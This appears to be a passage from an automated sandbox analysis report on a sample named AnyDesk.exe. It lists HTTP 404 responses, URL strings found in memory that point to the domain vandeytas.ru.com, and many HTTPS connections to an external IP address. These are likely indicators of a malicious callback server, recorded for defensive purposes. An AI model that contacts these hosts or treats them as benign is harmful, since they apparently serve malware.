Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:28 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:31 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:37 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:46 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:54 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:56 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:59 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:13:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:13:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:13:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:13:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:13:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1

Source: AnyDesk.exe, AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3383259657.000000007F9FF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3368038850.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120469469.0000000002872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: AnyDesk.exe, 00000000.00000002.3366823048.000000000063C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2517737691.0000000000644000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2474569149.000000000063E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2668808919.0000000000642000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2256562401.0000000000644000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2343804811.0000000000644000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2188445742.0000000000646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/
Source: AnyDesk.exe, 00000000.00000002.3382171324.000000002090D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/233_Hlv
Source: AnyDesk.exe, 00000000.00000002.3382171324.0000000020923000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2343804811.000000000064B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinff
Source: AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinff0
Source: AnyDesk.exe, 00000000.00000002.3382847342.00000000214E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2495985049.0000000000642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffL
Source: AnyDesk.exe, 00000000.00000002.3382847342.00000000214E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffLL
Source: AnyDesk.exe, 00000000.00000002.3382847342.00000000214E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.00000000005D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffT
Source: AnyDesk.exe, 00000000.00000003.2344442230.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2474569149.00000000005F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/233_HlvzmhuinffX
Source: AnyDesk.exe, 00000000.00000003.2734850198.0000000000642000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.000000000063C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2474569149.000000000063E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2668808919.0000000000642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinffg
Source: AnyDesk.exe, 00000000.00000003.2734850198.0000000000649000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2188445742.000000000063C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/233_Hlvzmhuinffi
Source: AnyDesk.exe, 00000000.00000003.2343804811.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/D
Source: AnyDesk.exe, 00000000.00000003.2734850198.0000000000642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/d
Source: AnyDesk.exe, 00000000.00000003.2734850198.0000000000642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com/l
Source: AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2734850198.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vandeytas.ru.com:443/233_Hlvzmhuinff

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900

Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49915 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49929 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49943 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49957 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49964 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49971 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50047 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50072 version: TLS 1.2

